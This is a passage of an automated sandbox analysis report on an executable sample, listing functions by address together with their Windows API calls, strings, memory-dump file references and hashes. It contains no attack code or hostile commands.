CoFreeUnusedLibraries.OLE32 ref: 00418465
GetTickCount.KERNEL32 ref: 0041846B

Part of subcall function 004183C8: CoFreeUnusedLibraries.OLE32 ref: 00418410
Part of subcall function 004183C8: OleUninitialize.OLE32 ref: 00418416

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: 37bcc0b9ec70731e75afa590af9179563710e06cc2db1fc6f504e6a409f04838
Instruction ID: 5ed12a9ced32f1e672aba556e9771a8520945e01a1c6e36ce1c04aac7d94e1ce
Opcode Fuzzy Hash: 37bcc0b9ec70731e75afa590af9179563710e06cc2db1fc6f504e6a409f04838
Instruction Fuzzy Hash: C7E065318102198BCB117F65ED846993FE9EB60320F54883FD54452560EF7458D1CB9E

Function 00456B60 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0044EA00: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044EA4D
Part of subcall function 0044EA00: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044EA5F
Part of subcall function 0044EA00: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 0044EA71

CreateThread.KERNEL32(00000000,00000000,Function_00054E40,?,00000000,00000000), ref: 00456C0B

Strings

Image creation, xrefs: 00456C49
Unable to proceed image creation., xrefs: 00456C1E

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::$CreateThread
String ID: Image creation$Unable to proceed image creation.
API String ID: 3717937526-1179224625
Opcode ID: 53ac35faa6348d0c2ab3cc4e38fc4c55484b7d6daf76e9ad6bd4111e9a432bfb
Instruction ID: aa640c41966a521ce456b1eba6f4d0f84235abaac69982dac97496319a6b7167
Opcode Fuzzy Hash: 53ac35faa6348d0c2ab3cc4e38fc4c55484b7d6daf76e9ad6bd4111e9a432bfb
Instruction Fuzzy Hash: 9A510870E01208EFDB14DF94D985BAEB7B1FB48305F20862AE811BB391C7786945CB59

Function 00445480 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004454B8
__wsplitpath_s.LIBCMT ref: 004454ED

Strings

.exe, xrefs: 004454FF

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap__wsplitpath_s
String ID: .exe
API String ID: 2676130442-4119554291
Opcode ID: 44139a6727e8fc3770ea92359c934211f349508270a67dbd4defaac63c99e3cb
Instruction ID: 57b85a3f1bca9e75e3183558b100086c877be86c357e1da5bf89d2ee4a8620f9
Opcode Fuzzy Hash: 44139a6727e8fc3770ea92359c934211f349508270a67dbd4defaac63c99e3cb
Instruction Fuzzy Hash: BD517B70901119ABDF14EB95DC99BEEB3B4AF04304F5045AEA01AB72D1EB386F84CF58

Function 00446570 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,0000040D,?,00000000), ref: 004465E1

Part of subcall function 0044BA30: InvalidateRect.USER32(?,00000000,00000001), ref: 0044BA56
Part of subcall function 0044BA30: UpdateWindow.USER32(?), ref: 0044BA63

Strings

h#I, xrefs: 004466AA
90, xrefs: 00446577

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: InvalidateMessagePostRectUpdateWindow
String ID: 90$h#I
API String ID: 1823492299-3953877988
Opcode ID: 9ef5793e3ae6b6c8f669db1112fb1f032a44621c378b45e966b9bf3ac79a11e5
Instruction ID: a190e7422467b7937111ce2cad0c1d01ffe7d80c546f1d5f78ca5bbf7d01b34c
Opcode Fuzzy Hash: 9ef5793e3ae6b6c8f669db1112fb1f032a44621c378b45e966b9bf3ac79a11e5
Instruction Fuzzy Hash: 99412970600204EFDB18CF85D595BAAB3B6FB88308F2542BDD5065B391C775AF01DB4A

Function 0041496C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00414973
_memset.LIBCMT ref: 004149C4

Strings

d, xrefs: 00414A0F

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: H_prolog3_catch_memset
String ID: d
API String ID: 1022661273-2564639436
Opcode ID: 4828fba0cb828158d6b2806d9765cb029fbe14cedb72874fff9a376c7432b85a
Instruction ID: 338a4bc540ae2961a1f0a00243fe7744ce971c93b1cd47c0c56123bb5e11df75
Opcode Fuzzy Hash: 4828fba0cb828158d6b2806d9765cb029fbe14cedb72874fff9a376c7432b85a
Instruction Fuzzy Hash: 1721D330900605EBCF119FA5C841AEFBBB5AF84354F20462BF520AB1D1D7394A91DB6A

Function 0040AE13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0040AD17: GetModuleHandleW.KERNEL32(KERNEL32,0040AE31), ref: 0040AD25
Part of subcall function 0040AD17: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 0040AD46
Part of subcall function 0040AD17: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 0040AD58
Part of subcall function 0040AD17: GetProcAddress.KERNEL32(ActivateActCtx), ref: 0040AD6A
Part of subcall function 0040AD17: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 0040AD7C

GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0040AE4B
SetLastError.KERNEL32(0000006F), ref: 0040AE62

Strings

, xrefs: 0040AE80

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AddressProc$Module$ErrorFileHandleLastName
String ID:
API String ID: 2524245154-3916222277
Opcode ID: 58a249d921f7ae405a78f36bee3b6750ed5992f1caa78fedf19acccd1347e8ec
Instruction ID: bd67fb1246e7b4dd37bef7f961dfc94710b971342fb756a250f0bbaa32a7af9f
Opcode Fuzzy Hash: 58a249d921f7ae405a78f36bee3b6750ed5992f1caa78fedf19acccd1347e8ec
Instruction Fuzzy Hash: 172130709003189ECB20EF75D8487EAB7F9BF04314F1046AED159E62C0DB785A85DF9A

Function 00422FD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00422FE0
_memset.LIBCMT ref: 004230D3

Strings

l G, xrefs: 00423079

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
